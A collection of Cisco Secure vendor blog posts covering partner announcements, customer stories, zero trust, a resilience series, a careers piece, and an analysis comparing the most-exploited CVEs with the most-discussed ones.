Resilience can also help customers deal with issues the moment they arise. If changes are needed, they will have the visibility to determine priorities, thanks to actionable intelligence and insight in the face of some major security realities that they are dealing with every day.

One, businesses are more interconnected, meaning that a breach on anyone in the value chain has dramatic ripple effects on the others.

Two, security attacks are becoming more personalized. Individuals remain one of the easiest targets for cybercriminals and their attacks are becoming more sophisticated and customized for the individual.

Three, hybrid work is here to stay. People around the world will continue to work from anywhere, on managed and unmanaged devices, over secured and unsecured networks, to applications spread across multiple clouds and data centers.

Innovating to win: Summary of Partner Summit announcements

Our vision for enabling a more resilient organization is the Cisco Security Cloud. It’s an open, integrated security platform that will protect the integrity of entire IT ecosystems by safeguarding users, devices and applications across public clouds and private data centers, without public cloud lock-in. Delivering on the Security Cloud is part of our long-term product strategy; but the innovations we are announcing at Partner Summit this week are foundational elements that execute on this vision.

Specifically, we are announcing new solutions and technologies across our portfolio in Secure Connectivity, Network Security, and Zero Trust. I encourage all partners to drill down on each announcement in the accompanying blogs and news announcements. But here are the highlights of the announcements.

Secure Access by Duo

Helping increase resistance to phishing attacks and improve user experience through frictionless access using Duo Passwordless, which is now generally available with support for Duo Mobile as a passwordless authenticator.

Secure Firewall 3100 Series

Expanding the Cisco Secure Firewall 3100 series, the first firewall purpose-built for hybrid work, with the Secure Firewall 3105, ideal for branch office and similar use cases focused on performance at a competitive price point.

Secure Connectivity Enhancements

Strengthening Umbrella’s data loss prevention (DLP) capabilities by adding API-based enforcement and unified reporting to protect sensitive data, e.g., intellectual property and financial and healthcare information. This complements Umbrella’s current inline-DLP functionality and collectively forms multi-mode DLP.

Cloud Application Security

New Secure Workload capabilities delivering policy-as-code workload security for cloud-native and public-cloud application development. Common use cases for policy-as-code include access control to infrastructure and simplifying enterprise compliance and controls.

Our partner enablement commitments

Our strategy and our innovation roadmap are all designed to set you up, our partners, for long-term success. In addition, we are committed to several partner enablement programs to help you deliver more value to customers and to help you become more profitable. Examples include:

  • Simplifying how you do business with Cisco: We are taking active steps to simplify the ease of doing business with Cisco Secure in ways that accelerate your velocity and scaling our growth through the channel. We are continuing to invest in our partners’ programs, offers, and expanding our routes to market so that our partners can be more profitable with Cisco Secure.
  • Compelling offers and promotions: Recent examples include “One Year on Us” that we expanded to include the complete SaaS and recurring software subscription portfolio. Specifically, partners can offer customers preferential pricing with 1-year free with a 3-year subscription purchase.
  • Investment in awareness: We want customers to ask for Cisco Secure by name, so we are aggressively investing in brand awareness. This includes a new secure the enterprise campaign “if it’s connected, it’s protected” designed to strengthen Cisco’s market perception as a world-class security solutions provider. We are also planning to back this up by investing more than $50 million in paid digital marketing specifically for security over the next year.

How you can own this week

Partner Summit is for you. So, my call-to-action is for you to maximize the value you get out of this week by attending as many of the informative, high-impact security sessions many teams worked hard to create. I am really looking forward to meeting as many of you as possible – on the expo floor, at the sessions, or in our 1-on-1 meetings.

Security has never been more critical and the need for resiliency is a requirement for virtually every business. The time for us to own it and innovate to win this future together has never been better.

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What do kickboxing and cybersecurity have in common

By Cristina Errico — October 31st 2022 at 12:00

When people think of cybersecurity, they think it is all about constant, in-the-moment, reactive execution. That is true in many regards, however, there is more to cybersecurity than that.  There is also a strategic side; that progressive, long-term vision to anticipate the unknown, convert fear into motivation, and prepare for future threats. 

As the Chief Operations Officer of Sara Assicurazioni, Luigi Vassallo has a philosophy that he lives by to keep his motivation strong. “The most important thing is not being the best one in a race, but the best version of yourself.” To put that into sharper perspective, Sara Assicurazioni is the largest insurance company in Italy with agency offices spread over 1500 points of sale. 

Part of Luigi’s credo is realized through his training as a kickboxer.  The challenges of getting into a boxing ring, and not knowing where the opponent may direct the next combination of blows is very similar to the uncertainties of cybersecurity.  You have a choice, either to cower in fear, or to take a proactive stance, preventing the opponent from ever gaining the opportunity to attack. This requires confidence and control. 

Sara Assicurazioni partnered with Cisco Secure to transform their entire security infrastructure. Luigi states, “Thanks to Cisco, when I explain where we are to our stakeholders and board members, I can reassure them that we are in control.”  However, like any good athlete, he doesn’t boast too broadly, adding “you need to be extremely safe and modest.” Some of the benefits that have been realized through adopting the Cisco Secure portfolio include: 

  • 2,000 endpoints controlled by Cisco technology, which intercepted 400 threats in the last 30 days. 
  • Validation of suspicious files, allowing security team to thwart sophisticated threats. 
  • Reduced threat investigation time, which translates to a nearly 20% increase in efficiency. 

One important aspect of a good strategy, whether you are an elite athlete or not, is to see the long-term effects of each maneuver. The vision Luigi had for Sara Assicurazioni was to become a “cloud first” organization.  This required careful planning, and most importantly, a firm foundation of trust that this direction was the right one for the organization and its stakeholders. “We are now a full digital company completely based on cloud infrastructure, and we have a lot of new digital services applications, and artificial intelligence.”   

Another part of any good strategy is understanding the importance of having a good team working with you.  An audience may see the lone boxer in the ring, but there are so many others involved with that person’s success.  Luigi credits his colleagues – from the IT and SecOps teams, all the way up to senior management – with the achievements of making Sara Assicurazioni as secure as possible. Luigi also adds more power to his punch by being a Cisco Insider Advocate, which enables him to channel his energy to inspire others.  He is also candidly self-aware of his part in the full security strategy. “I am not an elite athlete, but I like to win, and I like having Cisco on my team.” 

To find out more about Luigi’s journey, his challenges, and triumphs, tune into his customer story here. 

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Secure Your Hybrid Workforce Using These SOC Best Practices

By Pat Correia — October 27th 2022 at 12:00

Hybrid Workforce is here to stay

Just a few years ago when the topic of supporting offsite workers arose, some of the key conversation topics were related to purchase, logistics, deployment, maintenance and similar issues. The discussions back then were more like “special cases” vs. today’s environment where supporting workers offsite (now known as the hybrid workforce) has become a critical mainstream topic.

Figure 1: Security challenges in supporting the hybrid workforce

Now with the bulk of many organization’s workers off-premise, the topic of security and the ability of a security vendor to help support an organization’s hybrid workers has risen to the top of the selection criteria.  In a soon to be released Cisco endpoint survey, it’s not surprising that the ability of a security vendor to make supporting the hybrid workforce easier and more efficient was the key motivating factor when organizations choose security solutions.

Figure 2: Results from recent Cisco Survey

Best Practices complement your security tools

Today, when prospects and existing customers look at Cisco’s ability to support hybrid workers with our advanced security solution set and open platform, it’s quite clear that we can deliver on that promise. But, yes, good tools make it easier and more efficient, but the reality is that running a SOC or any security group, large or small, still takes a lot of work. Most organizations not only rely on advanced security tools but utilize a set of best practices to provide clarity of roles, efficiency of operation, and for the more prepared, have tested these best practices to prove to themselves that they are prepared for what’s next.

Give this a listen!

Knowing that not all organizations have this degree of security maturity and preparedness, we gathered a couple of subject matter experts together to discuss 5 areas of time-tested best practices that, besides the advanced tools offered by Cisco and others, can help your SOC (or small security team) yield actionable insights and guide you faster, and with more confidence, toward the outcomes you want.

In this webinar you will hear practical advice from Cisco technical marketing and a representative from our award winning Talos Threat Intelligence group, the same group who have created and are maintaining breach defense in partnership with Fortune 500 Security Operating Centers (SOC) around the globe.

Figure 3: Webinar Speakers

You can expect to hear our 5 Best Practices recommendations on the following topics;

  1. Establishing Consistency – know your roles and responsibilities without hesitation.
  2. Incident Response Plan – document it, share it and test it with your stakeholders.
  3. Threat Hunting – find out what you don’t know and minimize the threat.
  4. Retro Learning – learn from the past and be better prepared.
  5. Unifying stakeholders – don’t go it alone.

Access this On-Demand Webinar now!

Check out our webinar to find out how you can become more security resilient and be better prepared for what’s next.

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There’s no better time for zero trust

By Neville Letzerich — October 20th 2022 at 15:30

Security resilience requires strong, user-friendly defenses

The concept of zero trust is not a new one, and some may even argue that the term is overused. In reality, however, its criticality is growing with each passing day. Why? Because many of today’s attacks begin with the user. According to Verizon’s Data Breach Investigations Report, 82% of breaches involve the human element — whether it’s stolen credentials, phishing, misuse or error.

Additionally, today’s businesses are hyper-connected, meaning that — in addition to your employees — customers, partners and suppliers are all part of your ecosystem. Couple that with hybrid work, IoT, the move to the cloud, and more emboldened attackers, and organizational risk increases exponentially.

Adopting a zero trust model can dramatically reduce this risk by eliminating implicit trust. It has become so crucial, in fact, that several governments including the U.S., UK and Australia have released mandates and guidance for how organizations should deploy zero trust to improve national security.

However, because zero trust is more of a concept than a technology, and so many vendors use the term, organizations struggle with the best way to implement it. At Cisco, we believe you should take a holistic approach to zero trust, starting with what you have and adding on as you identify gaps in your defenses. And while layers of protection are necessary for powerful security, so is ease of use.

Strengthen security resilience with zero trust

Zero trust plays a major role in building security resilience, or the ability to withstand unpredictable threats or changes and emerge stronger. Through zero trust, the identity and security posture of users, devices and applications are continuously checked and verified to prevent network intrusions — and to also limit impact if an unauthorized entity does gain access.

Organizations with high zero trust maturity are twice as likely to achieve business resilience.
– Cisco’s Guide to Zero Trust Maturity

Eliminating trust, however, doesn’t really conjure up images of user-friendly technology. No matter how necessary they are for the business, employees are unlikely to embrace security measures that make their jobs more cumbersome and time-consuming. Instead, they want fast, consistent access to any application no matter where they are or which device they are using.

That’s why Cisco is taking a different approach to zero trust — one that removes friction for the user. For example, with Cisco Secure Access by Duo, organizations can provide those connecting to their network with several quick, easy authentication options. This way, they can put in place multi-factor authentication (MFA) that frustrates attackers, not users.

Enable seamless, secure access

Cisco Secure Access by Duo is a key pillar of zero trust security, providing industry-leading features for secure access, authentication and device monitoring. Duo is customizable, straightforward to use, and simple to set up. It enables the use of modern authentication methods including biometrics, passwordless and single sign-on (SSO) to help organizations advance zero trust without sacrificing user experience. Duo also provides the flexibility organizations need to enable secure remote access with or without a VPN connection.

During Cisco’s own roll-out of Duo to over 100,000 people, less than 1% of users contacted the help desk for assistance. On an annual basis, Duo is saving Cisco $3.4 million in employee productivity and $500,000 in IT help desk support costs. Furthermore, 86,000 potential compromises are averted by Duo each month.

Protect your hybrid work environment

La-Z-Boy, one of the world’s leading residential furniture producers, also wanted to defend its employees against cybersecurity breaches through MFA and zero trust. It needed a data security solution that worked agnostically, could grow with the company, and that was easy to roll out and implement.

“When COVID first hit and people were sent home to work remotely, we started seeing more hacking activity…” said Craig Vincent, director of IT infrastructure and operations at La-Z-Boy. “We were looking for opportunities to secure our environment with a second factor…. We knew that even post-pandemic we would need a hybrid solution.”

“It was very quick and easy to see where Duo fit into our environment quite well, and worked with any application or legacy app, while deploying quickly.” – Craig Vincent, Director of IT Infrastructure and Operations, La-Z-Boy

Today, Duo helps La-Z-Boy maintain a zero trust framework, stay compliant, and get clear visibility into what is connecting to its network and VPN. Zero trust helps La-Z-Boy secure its organization against threats such as phishing, stolen credentials and out-of-date devices that may be vulnerable to known exploits and malware.

Build a comprehensive zero trust framework

As mentioned, zero trust is a framework, not a single product or technology. For zero trust to be truly effective, it must do four things:

  1. Establish trust for users, devices and applications trying to access an environment
  2. Enforce trust-based access based on the principle of least privilege, only granting access to applications and data that users/devices explicitly need
  3. Continuously verify trust to detect any change in risk even after initial access is granted
  4. Respond to changes in trust by investigating and orchestrating response to potential incidents

Many technology companies may offer a single component of zero trust, or one aspect of protection, but Cisco’s robust networking and security expertise enables us to provide a holistic zero trust solution. Not only can we support all the steps above, but we can do so across your whole IT ecosystem.

Modern organizations are operating multi-environment ecosystems that include a mix of on-premises and cloud technologies from various vendors. Zero trust solutions should be able to protect across all this infrastructure, no matter which providers are in use. Protections should also extend from the network and cloud to users, devices, applications and data. With Cisco’s extensive security portfolio, operating on multiple clouds and platforms, zero trust controls can be embedded at every layer.

Map your path to zero trust

Depending on where you are in your security journey, embedding zero trust at every layer of your infrastructure may sound like a lofty endeavor. That’s why we meet customers where they are on their path to zero trust. Whether your first priority is to meet regulatory requirements, secure hybrid work, protect the cloud, or something else, we have the expertise to help you get started. We provide clear guidance and technologies for zero trust security mapped to established frameworks from organizations like CISA and NIST.

Much of our Cisco Secure portfolio can be used to build a successful zero trust framework, but some examples of what we offer include:

  • Frictionless, secure access for users, devices and applications through Cisco Duo
  • Flexible cloud security through Cisco Umbrella
  • Protected network connections and segmentation with the Cisco Identity Services Engine (ISE)
  • Application visibility and micro-segmentation via Cisco Secure Workload
  • Expert guidance from the Cisco Zero Trust Strategy Service

All of our technologies and services are backed by the unparalleled intelligence of Cisco Talos — so you always have up-to-date protection as you build your zero trust architecture. Additionally, our open, integrated security platform — Cisco SecureX — makes it simple to expand and scale your security controls, knowing they will work with your other technologies for more unified defenses.

Enhance security with an integrated platform

As Italy’s leading insurance company, Sara Assicurazioni requires complete visibility into its extended network, including a multi-cloud architecture and hybrid workforce. The company has adopted a comprehensive zero trust strategy through Cisco Secure.

“Our decentralized users, endpoints, and cloud-based servers and workloads contribute to a large attack surface,” says Paolo Perrucci, director of information and communications technology architectures and operations at Sara Assicurazioni. “With Cisco, we have the right level of visibility on this surface.”

“The main reason we chose Cisco is that only Cisco can offer a global security solution rather than covering one specific point…. Thanks to Cisco Secure, I’m quite confident that our security posture is now many times better because we are leveraging more scalable, state-of-the-art security solutions.” – Luigi Vassallo, COO & CTO, Sara Assicurazioni

Expand your zero trust strategy

To learn more, explore our zero trust page and sign up for one of our free zero trust workshops.

Watch video: How Cisco implemented zero trust in just five months 

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Introducing “NEXT” by Cisco Secure

By Tazin Khan — October 14th 2022 at 15:00

Inspiring discussions around innovative tech  

Technology has typically had a reputation for being exciting and inventive. Unfortunately, this hasn’t always been the case for security. But times have changed. We are now recognizing the crucial role security plays in any groundbreaking technology. Without strong defenses, even the most visionary app is likely to crash and burn. So it’s imperative that big security players like Cisco stay on top of what’s next.

I am thrilled to announce that in November, we will be launching our new video series, “NEXT” by Cisco Secure. In the series, my esteemed co-host TK Keanini and I will interview some of the brightest new minds in tech to find out more about the future of the industry and how we can best secure it. Watch the series preview below!

“NEXT” by Cisco Secure

Bringing cyber pioneers to the forefront  

As the CTO of Cisco Secure, TK has over 25 years of networking and security expertise, as well as a penchant for driving technical innovation. As for me, I’m a cybersecurity specialist of 10 years with an obsession for communication and empathy. Together, TK and I will bring new cyber pioneers to the forefront and highlight the criticality of digital protection and privacy for everyone.

Whether we’re discussing Web3, the metaverse, or next-generation healthcare, we’ll learn and laugh a lot. Through simple conversations about complex topics, we’re building a bridge between leading-edge tech and how Cisco is helping to safeguard what’s on the horizon.

Expanding security awareness 

And what better time to preview this series than during Cybersecurity Awareness Month? A time when we focus on the reality that security belongs to everyone — not just the threat hunter, or the product engineer, or the incident responder — but everyone.

We all have a responsibility to protect the world’s data and infrastructure, and should all have a seat at the table for important security conversations. We hope you’ll join us as we dive into what’s making waves out there, and how we can keep it safe.

Be a part of what’s next  

Follow our Cisco Secure social channels to catch our first episode in November, when we will speak with Michael Ebel, CEO of Atmosfy. Atmosfy is revolutionizing restaurant reviews by incorporating engaging live video that inspires others and supports local businesses. TK and I will chat with Michael about the origin of Atmosfy, and how the company keeps its content authentic and organization resilient.

In the meantime, explore our other Cybersecurity Awareness Month resources.

Who do you want to hear from next? Tell us your ideas for future guests in the comments.  


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Threat Trends: Vulnerabilities

By Ben Nahorney — September 27th 2022 at 12:00

Explore the nature of vulnerabilities in this episode of ThreatWise TV.

It’s shaping up to be another big year for vulnerability disclosure. Already the number of Common Vulnerabilities and Exposures (CVEs) disclosed has crossed 18,000 and it’s on track to make this another record-breaking year.

With new CVEs being disclosed daily, it has become increasingly difficult for security teams to stay abreast of the latest risks, let alone quickly determine which ones apply to their network environment. From those, prioritizing which CVEs to patch first adds an additional wrinkle to the process.

If this wasn’t challenging enough, a curve ball that’s often lobbed at security teams are the “breaking news” vulnerabilities— vulnerabilities picked up by the security media, often with much fanfare. The stories surrounding these high-profile vulnerabilities generally carry an implied threat that the CVE in question will throw the doors wide open to attackers if not addressed immediately. What security team hasn’t had someone from the C-suite share an article they’ve read, asking “are we protected from this?”

On the surface, CVEs that appear severe enough to garner media attention do seem like a good place to start when addressing vulnerabilities in your environment. But vulnerabilities are complicated, and what a security researcher manages to do within a controlled environment doesn’t always translate into real-world attacks. In fact, most disclosed vulnerabilities never see active exploitation. And of those that do, not every vulnerability ends up becoming a tool in an attacker’s arsenal. Bad actors generally follow the path of least resistance when they compromise a network, relying on tested exploits long before trying something new and unproven.

This begs the question: how much overlap is there between the most talked about vulnerabilities and those that are widely used in attacks? Moreover, if media attention isn’t a reliable indicator, what else might predict if a vulnerability will be used in an attack?

How to compare exploitation and media attention

To answer these questions, we used intelligence tools available from Cisco’s Kenna Security risk-based vulnerability management (RBVM) software. In particular, Kenna.VI+ consolidates a variety of vulnerability intelligence, where a CVE ID lookup can pull back a wealth of information. In addition to this, Kenna.VI+ includes an API that brings in an additional layer of external threat intelligence, enabling further analysis.

We started with a direct comparison of Successful Exploitations and Chatter Count from within Kenna.VI+. The former is a full count of confirmed exploits within the dataset, while the latter is a count of mentions in the news, social media, various forums, and the dark web.

The 30,000-foot view

Our first pass at the data included a comparison of the top 50 CVEs in both Successful Exploitations and Chatter Count. However, there were only two CVEs that overlapped. The data showed that many of the top exploited CVEs were old and predated the data in Chatter Count. We quickly decided that this wasn’t a fair comparison.

To get a better look at more relevant CVEs, we limited the dataset to a range of 10 years. Unfortunately, this did not do much to improve things—only three CVEs showed up in both lists.

The wheat from the chaff

A more effective approach was to look at CVEs that we know are actively being exploited. The Cybersecurity and Infrastructure Security Agency (CISA) happens to maintain such a list. The Known Exploited Vulnerabilities (KEV) catalog is considered an authoritative compilation of vulnerabilities identified as being actively exploited in the wild.

Running the KEV catalog though Kenna.VI+ resulted in six CVEs that appeared in the top 50 for both lists, with a single overlap in the top 10. This leads us to conclude that the vulnerabilities with the most discussion are not the same as those being actively exploited in the majority of cases.

Top 10 successfully exploited CVEs

  CVE Brief description
1 CVE-2017-9841 PHPUnit vulnerability (used to target popular CMSes)
2 CVE-2021-44228 Log4j vulnerability
3 CVE-2019-0703 Windows SMB information disclosure vulnerability
4 CVE-2014-0160 Heartbleed vulnerability
5 CVE-2017-9805 REST plugin in Apache Struts vulnerability
6 CVE-2017-11882 Microsoft Office memory corruption vulnerability
7 CVE-2017-5638 Apache Struts vulnerability (used in Equifax breach)
8 CVE-2012-1823 10-year-old PHP vulnerability
9 CVE-2017-0144 EternalBlue vulnerability
10 CVE-2018-11776 Apache Struts RCE vulnerability

Top 10 most talked about CVEs

  CVE Brief description
1 CVE-2021-26855 Microsoft Exchange vulnerability (used in Hafnium attacks)
2 CVE-2021-40444 Microsoft MSHTML RCE vulnerability
3 CVE-2021-26084 Confluence Server and Data Center vulnerability
4 CVE-2021-27065 Microsoft Exchange vulnerability (used in Hafnium attacks)
5 CVE-2021-34473 Microsoft Exchange vulnerability (used in Hafnium attacks)
6 CVE-2021-26858 Microsoft Exchange vulnerability (used in Hafnium attacks)
7 CVE-2021-44228 Log4j vulnerability
8 CVE-2021-34527 One of the PrintNightmare vulnerabilities
9 CVE-2021-41773 Apache HTTP Server vulnerability
10 CVE-2021-31207 One of the ProxyShell vulnerabilities

Name recognition on both sides

Despite the lack of overlap, there are many well-known vulnerabilities at the top of both lists. Heartbleed and EternalBlue appear on the top 10 exploited list, while Hafnium, PrintNightmare, and ProxyShell make the top 10 most talked about CVEs.

The Log4j vulnerability is the only CVE that appears in both lists. This isn’t surprising considering the ubiquity of Log4j in modern software. It’s the second-most exploited vulnerability—far outpacing the CVEs directly below it. This, coupled with its appearance in the chatter list, puts it in a class of its own. In a brief period, it’s managed to outpace older CVEs that are arguably just as well known.

Prominent offenders

The CVE that recorded the most successful exploitations is a five-year-old vulnerability in PHPUnit. This is a popular unit-testing framework that’s used by many CMSes, such as Drupal, WordPress, MediaWiki, and Moodle.

Since many websites are built with these tools, this exploit can be a handy vector for gaining initial access to unpatched webservers. This also lines up with research we conducted last year, where this vulnerability was one of the most common Snort detections seen by Cisco Secure Firewall.

All four of the Microsoft Exchange Server vulnerabilities used in the Hafnium attacks appear in the most talked about list of CVEs. However, even when you add all four of these CVEs together, they still don’t come anywhere close to the counts seen in the top exploited CVEs.

Alternative indicators

If media attention is not a good predictor of use for exploitation, then what are the alternatives?

The Common Vulnerability Scoring System (CVSS) is a well-known framework for gauging the severity of vulnerabilities. We looked for CVEs from the KEV catalog that were ranked as “critical”—9.0 and above in the CVSSv3 specification. Examining the entire KEV catalog, 28% of the CVEs have a score of 9.0 or higher. Of the top 50 successfully exploited, 38% had such scores.

This is an improvement, but the CVSSv3 specification was released in 2015. Many CVEs in the KEV catalog predate this—19% of the entire catalog and 28% of the top 50—and have no score.

Using the previous CVSS specification does fill this gap—36% overall and 52% of the top 50 score 9.0 or higher. However, the older CVSS specification comes with its share of issues as well.

Another indicator worth exploring is remote control execution (RCE). A vulnerability with RCE grants an attacker the ability to access and control a vulnerable system from anywhere.  It turns out that 45% of the CVEs in our dataset allow for RCE, and 66% of the top 50, making it the most worthwhile indicator analyzed.

Honing the approach

Let’s summarize how we’ve honed our approach to determine if media attention and exploitation line up:

Data set Exploitation and Chatter lists Number of CVEs
All CVEs Appears in both top 50 2
Appears in both top 50 (last 10 years) 3
KEV Catalog Appears in both top 50 6
Appears in both top 10 1

And here’s a summary of our look at other indicators:

  KEV Catalog Top 50 exploited
CVSSv3 (9.0+) 28% 38%
CVSS (9.0+) 36% 52%
Allows for RCE 45% 66%

All of this analysis provides a clear answer to our original question—the most regularly exploited CVEs aren’t the most talked about. Additional work highlights that monitoring variables like RCE can help with prioritization.

For illustrative purposes we’ve only looked at a few indicators that could be used to prioritize CVEs. While some did better than others, we don’t recommend relying on a single variable in making decisions about vulnerability management. Creating an approach that folds in multiple indicators is a far better strategy when it comes to real-world application of this data. And while our findings here speak to the larger picture, every network is different.

Regardless of which list they appear on, be it Successful Exploitations or Chatter Count, it’s important to point out that all these vulnerabilities are serious. Just because Hafnium has more talk than Heartbleed doesn’t make it any less dangerous if you have assets that are vulnerable to it. The fact is that while CVEs with more talk didn’t make the top of the exploitation list, they still managed to rack up tens of thousands of successful exploitations.

It’s important to know how to prioritize security updates, fixing those that expose you to the most risk as soon as possible. From our perspective, here are some basic elements in the Cisco Secure portfolio that can help.

Kenna Security, a pioneer in risk-based vulnerability management, relies on threat intel and prioritization to keep security and IT teams focused on risks. Using data science, Kenna processes and analyzes 18+ threat and exploit intelligence feeds, and 12.7+ billion managed vulnerabilities to give you an accurate view of your company’s risk. With our risk scoring and remediation intelligence, you get the info you need to make truly data-driven remediation decisions.

To responsibly protect a network, it’s important to monitor all assets that connect to it and ensure they’re kept up to date. Duo Device Trust can check the patch level of devices for you before they’re granted access to connect to corporate applications or sensitive data. You can even block access and enable self-remediation for devices that are found to be non-compliant.

How about remote workers? By leveraging the Network Visibility Module in Cisco Secure Client as a telemetry source, Cisco Secure Cloud Analytics can capture endpoint-specific user and device context to supply visibility into remote worker endpoint status. This can bolster an organization’s security posture by providing visibility on remote employees that are running software versions with vulnerabilities that need patching.

Lastly, for some “lateral thinking” about vulnerability management, take a look at this short video of one of our Advisory CISOs, Wolfgang Goerlich. Especially if you’re a fan of the music of the 1920s…

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The 4 Lenses of Resilience and What They Mean for Security

By Shailaja Shankar — September 20th 2022 at 12:00

We’ve been talking a lot about security resilience recently, and for good reason. It’s clear the only way businesses can operate in today’s hybrid world is by taking bold steps to increase visibility, awareness, and integration across their systems. All while maintaining a singular goal of becoming more resilient in the face of evolving threats. But that doesn’t just mean expanding the scope of your security stack. It also means examining the resilience of other pillars of your business, like operations, organizational structure, financial processes, and supply chain functions.

What is Financial Resilience?

If threats do compromise your business, time is of the essence when it comes to detection, response, and recovery. The longer an organization is unable to operate normally, the more at risk it becomes for damaging financial losses. As Diana Kelley, CSO and CISO at Cybrize notes, “it’s not about giving up, it’s about being better prepared.” Financial and security resilience go together, you can’t have one without the other and both are incredibly important for businesses of all sizes.

What is Operational Resilience?

While recovering from an attack is important for maintaining resilience, a key feature of strong operational resilience is a business’s ability to operate through adverse conditions, not just recover well after the fact. Trina Ford, SVP and CISO at AEG, notes the importance of “preparedness so that your business can continue to thrive” while your security team addresses threats.

It also relies heavily upon strong staffing models because people are a critical part of any business’s day-to-day operations. What happens when someone is out sick, or is unable to access the necessary tools to do their job? Operational resilience means having a plan in place to be prepared for these situations.

In this video, CISOs and other security professionals explain what operational resilience means to them and why it’s a necessary component of overall security resilience:

What is Supply Chain Resilience?

If the past few years have taught us anything, it’s that supply chains are fragile. But there are ways to prepare for disruption, such as minimizing negative outcomes like production delays, infrastructure weaknesses, and increasingly complex logistics. When it comes to security resilience, supply chains are important because they expand the attack surface to any third party in your network. Oftentimes, this is where businesses have the lowest visibility, making it hard to detect and respond to threats. Supply chain resilience means preparing for these challenges before they cause real damage and having contingency plans in place. 

What is Organizational Resilience?

According to Helen Patton, CISO of the SBG, “security is a risk business”. We couldn’t agree more. In the context of organizational resilience, this means dedicating resources to the areas of the business that are creating the most value and protecting those to minimize the risk of damage from potential threats.

With hybrid work here to stay, the threat landscape is expanding quickly, and security teams are working constantly to stay up to date on the latest attacks. But defending against everything all the time is impossible, so it’s necessary to make informed decisions about how to dedicate resources efficiently. The goal is to maximize flexibility and agility to enable security teams to act confidently when, not if, a threat lands.

Avoiding cyberattacks 100% of the time is impossible, but by ensuring the integrity of each part of your business, you can address threats confidently and emerge stronger. Investing in security resilience will strengthen your business in each of these areas, and help you better prepare for the challenges ahead.

Learn more about how Cisco Secure can help you at any step of the journey.

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Know Thyself: 10 Ways to Discover Your Work Environment Needs and What It’s Really Like to Work at Cisco

By Mary Kate Schmermund — August 31st 2022 at 12:00

Self-awareness goes a long way in determining your next professional steps. While job searching, it’s critical to identify how to leverage your transferable skills and network, while also evaluating what environmental factors of work and work culture matter to you most. Learn what it’s like to work at Cisco and the top 10 ways to suss out a workplace that suits your needs from leaders at Cisco Secure, Cisco Talos and Duo Security.

1. Beyond a ping-pong table: Discerning a company’s culture

First things first. Emily Reid, the newly appointed director of employee experience at Cisco Secure who came from Duo Security, advises, “Do your own research to see how the company and their employees describe the culture publicly — on the company’s website and through other sites, articles and resources. For tech companies specifically I always think, “What else do you have beyond the ping-pong table?”’

The interview process is the next key opportunity to find out what culture is like beyond amenities. To gain multiple perspectives, Reid recommends asking about company culture in every interview you have.

The question at the top of Reid’s list: Do you have programs and resources to support the development and success of your employees? “I want to know how a company will be investing in my career growth and if I will feel welcome and included as part of the team. Seeing what a company chooses to center and highlight when describing their culture is usually very telling,” she said.

Interning at a company is another way to get firsthand knowledge and can lead to full-time employment.  “several former interns are now people leaders managing their own teams — and their own interns — coming full circle,” Reid said.

2. Can you bring your whole self to work?

Knowing that there is safety and support in bringing your whole self to work is vital. What policies, programs and initiatives are in place that demonstrate an organization’s commitment to diversity, equity, inclusion and belonging?

Cisco’s ongoing commitments to social justice and pay parity include twelve action steps as part of Cisco’s Social Justice Blueprint. Cultivating a conscious culture includes on-going dialogue, programs and events meant to increase equality. Employee Resource Organizations and mentorship programs provide more opportunities to build community and share knowledge, resources and advocacy.

3. Remote, in person, or hybrid?

What environment allows you to do your best work? Also consider what perks and processes an employer offers to enhance flexibility and adaptability. During the pandemic, Duo and Cisco transitioned  all global events, training and professional development workshops to fully virtual. As in person options resumed following the pandemic, all events are designed to ensure an inclusive experience no matter where you’re joining from.

“We don’t want to go back to a world where people not based in an office feel like they are getting a lesser experience,” Reid said.

Considering how to make programs and information accessible to employees regardless of where they work is also important to Sammi Seaman, team lead of employee experience at Cisco Talos. She’s currently spearheading a new hire program that is “more inclusive of folks whether they’re office based, remote or somewhere across the world.”

4. A work-life balance that works for you

It’s essential to consider how you want your life and work to intersect, particularly as hybrid work becomes more popular. How important is paid time off, flexible work options or a consistent structure?

Cisco Secure offers “Days for Me,” days off for employees to decompress and do something to fill their cups. Monthly “Focus Days” are days without meetings, so employees can prioritize the projects that need attention.

Curran recalls one candidate who, despite multiple offers from competitors, chose Cisco Secure because of the flexible work environment: “This person has a young child and felt that the “Days for Me” and flexibility to work from home in a hybrid situation would work best for his career long-term.”

As Reid’s team helps lead the transition to hybrid work, the book Out of Office: The Big Problem and Bigger Promise of Working From Home by Charlie Warzel and Anne Helen Petersen has been inspiring. The book “does an amazing job of sharing a vision for an inclusive future that empowers employees to be successful and have a ‘work/life balance’ that truly works,” Reid said.

5. Supporting accessibility as the workplace evolves

Currently Cisco Secure offers a hybrid model while many employees still work remotely. In terms of maintaining accessibility through this transition, Marketing Specialist Julie Kramer advocated for more accessibility and saw changes at Cisco as a result.

“Webex pre-COVID didn’t have any closed captioning. So, another deaf person and I reached out and closed captioning and the transcript option got added,” Kramer shared.

Kramer prefers to have high-quality and frequently the same interpreters who “know the terminology for my job, marketing and technology. In business, the security and marketing industry can really talk fast, so you need a high-quality interpreter that can keep up and one that is qualified and certified,” she said.

6. Is a fast-paced environment your speed?

Consider what pace of your specific role and within an industry is needed for you to feel engaged without overwhelmed. While different roles within the same organization and industry may run at different paces, it’s important to tune into what might be expected on your potential new team.

Seaman finds that the fast pace of cybersecurity can be “delightful and challenging. There’s a lot of fast-paced pivoting that happens, which makes for an interesting workplace because two days are never the same,” she said.

7. What structures and opportunities for collaboration motivate you?

Do you prefer a hierarchical structure, or one that is more flat? Are you most effective and fulfilled riding solo, or while consistently connecting with coworkers? Does contributing your ideas make you feel empowered?

At Cisco Secure, there is space to join conversations. “No matter where you sit in the company, you have a voice and can speak up and collaborate and self-organize on a project. It feels like a bunch of really hard working, humble, smart people who are trying to solve problems together,” said Manager of Duo’s Global Knowledge and Communities Team Kelly Davenport.

To enhance communication and knowledge among distributed teams, Seaman started a dialogue series called “The More You Know.” Questions include: What do you do? How do you do it? How can that help other parts of Cisco Talos? The conversations lead to future collaboration and resource sharing.

8. Does teaching and learning energize you?

Do you want to grow professionally and increase your skills and knowledge? A culture of teaching and learning within an organization can help hone and expand your skills and connections.

Lead of Strategic Business Intelligence Ashlee Benge finds the security world “very dynamic. You really can never stop learning. Within Cisco Talos, the people around me are such smart, dedicated people that there’s really a lot that you can gain from just being involved in the group as a whole.”

For Seaman, who didn’t come from a technical background, Cisco Talos offered opportunities to expand her technical knowledge, including from colleagues. “Coming into Cisco Talos, people are like, “Here, let me teach you. You can totally do this. Just because you didn’t know how to do it doesn’t mean you can’t learn. Let’s go,” Seaman shared. Seaman’s colleagues have also learned from her expertise in information and knowledge management given her background as a librarian.


